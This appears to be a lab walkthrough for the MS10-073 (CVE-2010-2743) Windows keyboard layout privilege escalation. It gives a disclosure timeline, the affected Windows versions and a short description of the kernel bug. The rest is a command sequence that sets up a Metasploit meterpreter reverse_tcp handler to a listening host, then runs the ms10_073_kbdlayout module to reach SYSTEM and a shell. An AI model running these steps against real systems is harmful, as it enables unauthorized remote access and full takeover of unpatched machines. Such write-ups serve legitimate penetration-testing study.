MS10-073 : Microsoft Windows Keyboard Layout Privilege Escalation

Timeline :

Vulnerability disclosed by Microsoft the 2010-10-12
Microsoft patch “KB981957” provided the 2010-10-12
Exploit-DB PoC provided by Ruben Santamarta the 2011-01-13
Metasploit PoC provided by jduck the 2011-01-17

PoC provided by :

Ruben Santamarta
jduck

Reference(s) :

CVE-2010-2743
MS10-073

Affected version(s) :

Windows XP SP3
Windows XP Professional x64 Edition SP2
Windows Server 2003 SP2
Windows Server 2003 x64 Edition SP2
Windows Vista SP1 and Windows Vista SP2
Windows Vista x64 Edition SP1 and Windows Vista x64 Edition SP2
Windows Server 2008 for 32-bit Systems and Windows Server 2008 for 32-bit SP2
Windows Server 2008 for x64-based Systems and Windows Server 2008 for x64-based SP2
Windows 7 for 32-bit Systems
Windows 7 for x64-based Systems
Windows Server 2008 R2 for x64-based Systems

Tested on Windows XP SP3

Description :

This module exploits the keyboard layout 0day exploited by Stuxnet. When processing specially crafted keyboard layout files (DLLs), the Windows kernel fails to validate that an array index is within the bounds of the array. By loading a specially crafted keyboard layout, an attacker can execute code in Ring 0.

Commands :

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
ifconfig
set LHOST 192.168.178.21
exploit -j

sessions
sessions -i 1
getuid
getsystem
ps
migrate xxxx
background

use post/windows/escalate/ms10_073_kbdlayout
info
show options
set SESSION 1
exploit

sessions -i 1
getuid
getsystem
shell